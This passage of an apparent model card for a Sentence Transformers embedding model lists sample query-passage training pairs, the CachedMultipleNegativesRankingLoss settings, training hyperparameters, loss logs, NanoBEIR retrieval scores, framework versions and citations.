| <code>when did richmond last play in a preliminary final</code> | <code>Richmond Football Club Richmond began 2017 with 5 straight wins, a feat it had not achieved since 1995. A series of close losses hampered the Tigers throughout the middle of the season, including a 5-point loss to the Western Bulldogs, 2-point loss to Fremantle, and a 3-point loss to the Giants. Richmond ended the season strongly with convincing victories over Fremantle and St Kilda in the final two rounds, elevating the club to 3rd on the ladder. Richmond's first final of the season against the Cats at the MCG attracted a record qualifying final crowd of 95,028; the Tigers won by 51 points. Having advanced to the first preliminary finals for the first time since 2001, Richmond defeated Greater Western Sydney by 36 points in front of a crowd of 94,258 to progress to the Grand Final against Adelaide, their first Grand Final appearance since 1982. The attendance was 100,021, the largest crowd to a grand final since 1986. The Crows led at quarter time and led by as many as 13, but the Tig...</code> |
| <code>who sang what in the world's come over you</code> | <code>Jack Scott (singer) At the beginning of 1960, Scott again changed record labels, this time to Top Rank Records.[1] He then recorded four Billboard Hot 100 hits – "What in the World's Come Over You" (#5), "Burning Bridges" (#3) b/w "Oh Little One" (#34), and "It Only Happened Yesterday" (#38).[1] "What in the World's Come Over You" was Scott's second gold disc winner.[6] Scott continued to record and perform during the 1960s and 1970s.[1] His song "You're Just Gettin' Better" reached the country charts in 1974.[1] In May 1977, Scott recorded a Peel session for BBC Radio 1 disc jockey, John Peel.</code> |
| <code>who produces the most wool in the world</code> | <code>Wool Global wool production is about 2 million tonnes per year, of which 60% goes into apparel. Wool comprises ca 3% of the global textile market, but its value is higher owing to dying and other modifications of the material.[1] Australia is a leading producer of wool which is mostly from Merino sheep but has been eclipsed by China in terms of total weight.[30] New Zealand (2016) is the third-largest producer of wool, and the largest producer of crossbred wool. Breeds such as Lincoln, Romney, Drysdale, and Elliotdale produce coarser fibers, and wool from these sheep is usually used for making carpets.</code> |
* Loss: [<code>CachedMultipleNegativesRankingLoss</code>](https://sbert.net/docs/package_reference/sentence_transformer/losses.html#cachedmultiplenegativesrankingloss) with these parameters:
```json
{
"scale": 20.0,
"similarity_fct": "cos_sim",
"mini_batch_size": 32,
"gather_across_devices": false
}
```
### Training Hyperparameters
#### Non-Default Hyperparameters
- `overwrite_output_dir`: True
- `per_device_train_batch_size`: 1024
- `learning_rate`: 0.0002
- `num_train_epochs`: 1
- `lr_scheduler_type`: cosine
- `warmup_ratio`: 0.1
- `fp16`: True
- `batch_sampler`: no_duplicates
#### All Hyperparameters
<details><summary>Click to expand</summary>
- `overwrite_output_dir`: True
- `do_predict`: False
- `eval_strategy`: no
- `prediction_loss_only`: True
- `per_device_train_batch_size`: 1024
- `per_device_eval_batch_size`: 8
- `per_gpu_train_batch_size`: None
- `per_gpu_eval_batch_size`: None
- `gradient_accumulation_steps`: 1
- `eval_accumulation_steps`: None
- `torch_empty_cache_steps`: None
- `learning_rate`: 0.0002
- `weight_decay`: 0.0
- `adam_beta1`: 0.9
- `adam_beta2`: 0.999
- `adam_epsilon`: 1e-08
- `max_grad_norm`: 1.0
- `num_train_epochs`: 1
- `max_steps`: -1
- `lr_scheduler_type`: cosine
- `lr_scheduler_kwargs`: {}
- `warmup_ratio`: 0.1
- `warmup_steps`: 0
- `log_level`: passive
- `log_level_replica`: warning
- `log_on_each_node`: True
- `logging_nan_inf_filter`: True
- `save_safetensors`: True
- `save_on_each_node`: False
- `save_only_model`: False
- `restore_callback_states_from_checkpoint`: False
- `no_cuda`: False
- `use_cpu`: False
- `use_mps_device`: False
- `seed`: 42
- `data_seed`: None
- `jit_mode_eval`: False
- `use_ipex`: False
- `bf16`: False
- `fp16`: True
- `fp16_opt_level`: O1
- `half_precision_backend`: auto
- `bf16_full_eval`: False
- `fp16_full_eval`: False
- `tf32`: None
- `local_rank`: 0
- `ddp_backend`: None
- `tpu_num_cores`: None
- `tpu_metrics_debug`: False
- `debug`: []
- `dataloader_drop_last`: False
- `dataloader_num_workers`: 0
- `dataloader_prefetch_factor`: None
- `past_index`: -1
- `disable_tqdm`: False
- `remove_unused_columns`: True
- `label_names`: None
- `load_best_model_at_end`: False
- `ignore_data_skip`: False
- `fsdp`: []
- `fsdp_min_num_params`: 0
- `fsdp_config`: {'min_num_params': 0, 'xla': False, 'xla_fsdp_v2': False, 'xla_fsdp_grad_ckpt': False}
- `fsdp_transformer_layer_cls_to_wrap`: None
- `accelerator_config`: {'split_batches': False, 'dispatch_batches': None, 'even_batches': True, 'use_seedable_sampler': True, 'non_blocking': False, 'gradient_accumulation_kwargs': None}
- `parallelism_config`: None
- `deepspeed`: None
- `label_smoothing_factor`: 0.0
- `optim`: adamw_torch_fused
- `optim_args`: None
- `adafactor`: False
- `group_by_length`: False
- `length_column_name`: length
- `ddp_find_unused_parameters`: None
- `ddp_bucket_cap_mb`: None
- `ddp_broadcast_buffers`: False
- `dataloader_pin_memory`: True
- `dataloader_persistent_workers`: False
- `skip_memory_metrics`: True
- `use_legacy_prediction_loop`: False
- `push_to_hub`: False
- `resume_from_checkpoint`: None
- `hub_model_id`: None
- `hub_strategy`: every_save
- `hub_private_repo`: None
- `hub_always_push`: False
- `hub_revision`: None
- `gradient_checkpointing`: False
- `gradient_checkpointing_kwargs`: None
- `include_inputs_for_metrics`: False
- `include_for_metrics`: []
- `eval_do_concat_batches`: True
- `fp16_backend`: auto
- `push_to_hub_model_id`: None
- `push_to_hub_organization`: None
- `mp_parameters`:
- `auto_find_batch_size`: False
- `full_determinism`: False
- `torchdynamo`: None
- `ray_scope`: last
- `ddp_timeout`: 1800
- `torch_compile`: False
- `torch_compile_backend`: None
- `torch_compile_mode`: None
- `include_tokens_per_second`: False
- `include_num_input_tokens_seen`: False
- `neftune_noise_alpha`: None
- `optim_target_modules`: None
- `batch_eval_metrics`: False
- `eval_on_start`: False
- `use_liger_kernel`: False
- `liger_kernel_config`: None
- `eval_use_gather_object`: False
- `average_tokens_across_devices`: False
- `prompts`: None
- `batch_sampler`: no_duplicates
- `multi_dataset_batch_sampler`: proportional
- `router_mapping`: {}
- `learning_rate_mapping`: {}
</details>
### Training Logs
| Epoch | Step | Training Loss | NanoClimateFEVER_cosine_ndcg@10 | NanoDBPedia_cosine_ndcg@10 | NanoFEVER_cosine_ndcg@10 | NanoFiQA2018_cosine_ndcg@10 | NanoHotpotQA_cosine_ndcg@10 | NanoMSMARCO_cosine_ndcg@10 | NanoNFCorpus_cosine_ndcg@10 | NanoNQ_cosine_ndcg@10 | NanoQuoraRetrieval_cosine_ndcg@10 | NanoSCIDOCS_cosine_ndcg@10 | NanoArguAna_cosine_ndcg@10 | NanoSciFact_cosine_ndcg@10 | NanoTouche2020_cosine_ndcg@10 | NanoBEIR_mean_cosine_ndcg@10 |
|:------:|:----:|:-------------:|:-------------------------------:|:--------------------------:|:------------------------:|:---------------------------:|:---------------------------:|:--------------------------:|:---------------------------:|:---------------------:|:---------------------------------:|:--------------------------:|:--------------------------:|:--------------------------:|:-----------------------------:|:----------------------------:|
| 0.1020 | 10 | 4.5978 | - | - | - | - | - | - | - | - | - | - | - | - | - | - |
| 0.2041 | 20 | 3.903 | - | - | - | - | - | - | - | - | - | - | - | - | - | - |
| 0.3061 | 30 | 2.5388 | - | - | - | - | - | - | - | - | - | - | - | - | - | - |
| 0.4082 | 40 | 1.0295 | - | - | - | - | - | - | - | - | - | - | - | - | - | - |
| 0.5102 | 50 | 0.5117 | - | - | - | - | - | - | - | - | - | - | - | - | - | - |
| 0.6122 | 60 | 0.4063 | - | - | - | - | - | - | - | - | - | - | - | - | - | - |
| 0.7143 | 70 | 0.3684 | - | - | - | - | - | - | - | - | - | - | - | - | - | - |
| 0.8163 | 80 | 0.3592 | - | - | - | - | - | - | - | - | - | - | - | - | - | - |
| 0.9184 | 90 | 0.3371 | - | - | - | - | - | - | - | - | - | - | - | - | - | - |
| -1 | -1 | - | 0.3105 | 0.5588 | 0.8018 | 0.3959 | 0.7028 | 0.5942 | 0.2646 | 0.6242 | 0.9566 | 0.3758 | 0.5215 | 0.6502 | 0.4812 | 0.5568 |
### Framework Versions
- Python: 3.12.11
- Sentence Transformers: 5.1.1
- Transformers: 4.56.1
- PyTorch: 2.8.0+cu126
- Accelerate: 1.10.1
- Datasets: 4.1.1
- Tokenizers: 0.22.0
## Citation
### BibTeX
#### Sentence Transformers
```bibtex
@inproceedings{reimers-2019-sentence-bert,
title = "Sentence-BERT: Sentence Embeddings using Siamese BERT-Networks",
author = "Reimers, Nils and Gurevych, Iryna",
booktitle = "Proceedings of the 2019 Conference on Empirical Methods in Natural Language Processing",
month = "11",
year = "2019",
publisher = "Association for Computational Linguistics",
url = "https://arxiv.org/abs/1908.10084",
}
```
#### CachedMultipleNegativesRankingLoss
```bibtex
@misc{gao2021scaling,
title={Scaling Deep Contrastive Learning Batch Size under Memory Limited Setup},
author={Luyu Gao and Yunyi Zhang and Jiawei Han and Jamie Callan},
year={2021},
eprint={2101.06983},
archivePrefix={arXiv},
primaryClass={cs.LG}
}
```
<!--
## Glossary
*Clearly define terms in order to be accessible across audiences.*
-->
<!--
## Model Card Authors
*Lists the people who create the model card, providing recognition and accountability for the detailed work that goes into its construction.*
-->
<!--
## Model Card Contact
*Provides a way for people who have updates to the Model Card, suggestions, or questions, to contact the Model Card authors.*
-->
|
Subsets and Splits
Filtered Qwen2.5 Distill Models
Identifies specific configurations of models by filtering cards that contain 'distill', 'qwen2.5', '7b' while excluding certain base models and incorrect model ID patterns, uncovering unique model variants.
Filtered Model Cards Count
Finds the count of entries with specific card details that include 'distill', 'qwen2.5', '7b' but exclude certain base models, revealing valuable insights about the dataset's content distribution.
Filtered Distill Qwen 7B Models
Filters for specific card entries containing 'distill', 'qwen', and '7b', excluding certain strings and patterns, to identify relevant model configurations.
Filtered Qwen-7b Model Cards
The query performs a detailed filtering based on specific keywords and excludes certain entries, which could be useful for identifying a specific subset of cards but does not provide deeper insights or trends.
Filtered Qwen 7B Model Cards
The query filters for specific terms related to "distilled" or "distill", "qwen", and "7b" in the 'card' column but excludes certain base models, providing a limited set of entries for further inspection.
Qwen 7B Distilled Models
The query provides a basic filtering of records to find specific card names that include keywords related to distilled Qwen 7b models, excluding a particular base model, which gives limited insight but helps in focusing on relevant entries.
Qwen 7B Distilled Model Cards
The query filters data based on specific keywords in the modelId and card fields, providing limited insight primarily useful for locating specific entries rather than revealing broad patterns or trends.
Qwen 7B Distilled Models
Finds all entries containing the terms 'distilled', 'qwen', and '7b' in a case-insensitive manner, providing a filtered set of records but without deeper analysis.
Distilled Qwen 7B Models
The query filters for specific model IDs containing 'distilled', 'qwen', and '7b', providing a basic retrieval of relevant entries but without deeper analysis or insight.
Filtered Model Cards with Distill Qwen2.
Filters and retrieves records containing specific keywords in the card description while excluding certain phrases, providing a basic count of relevant entries.
Filtered Model Cards with Distill Qwen 7
The query filters specific variations of card descriptions containing 'distill', 'qwen', and '7b' while excluding a particular base model, providing limited but specific data retrieval.
Distill Qwen 7B Model Cards
The query filters and retrieves rows where the 'card' column contains specific keywords ('distill', 'qwen', and '7b'), providing a basic filter result that can help in identifying specific entries.